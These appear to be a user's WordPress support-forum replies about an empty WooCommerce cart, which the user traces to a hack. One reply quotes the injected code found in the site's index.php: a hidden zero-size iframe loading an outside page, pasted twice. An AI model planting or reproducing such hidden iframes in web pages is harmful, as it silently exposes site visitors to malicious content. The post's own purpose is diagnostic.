behzadmy
Forum Replies Created
-
Forum: Plugins
In reply to: [Offers for WooCommerce] Cart Is Currently EmptyI found the problem.
There was hacked content on my index.php:<html><iframe src=”http://mandon.nl/products/flash/01.html” marginwidth=”0″ marginheight=”0″ width=”0″ height=”0″ scrolling=”no” border=”0″ frameborder=”0″></iframe></html><html><iframe src=”http://mandon.nl/products/flash/01.html” marginwidth=”0″ marginheight=”0″ width=”0″ height=”0″ scrolling=”no” border=”0″ frameborder=”0″></iframe></html><?php
I guess hackers use one of famous newsletter plugins to penetrate to wordpress (I checked errors log and users that changed their password just before hacking ). Now i deleted the plugin.Forum: Plugins
In reply to: [Offers for WooCommerce] Cart Is Currently Empty@angelleyesupport
Thank you for your reply,
I checked error log. the problem started just after this error:PHP Warning: Cannot modify header information – headers already sent by (output started at /home/…../public_html/index.php:1) in /home/…../public_html/wp-includes/pluggable.php on line 1219
The line 1219 is: header(“Location: $location”, true, $status);
And these error occurs many times a day.Forum: Plugins
In reply to: [Offers for WooCommerce] Cart Is Currently EmptyI have the same problem. I have cleared cache, have created new cart page, have disabled all plug-ins except Woocommerce, have used default WordPress theme, but it has not solved yet.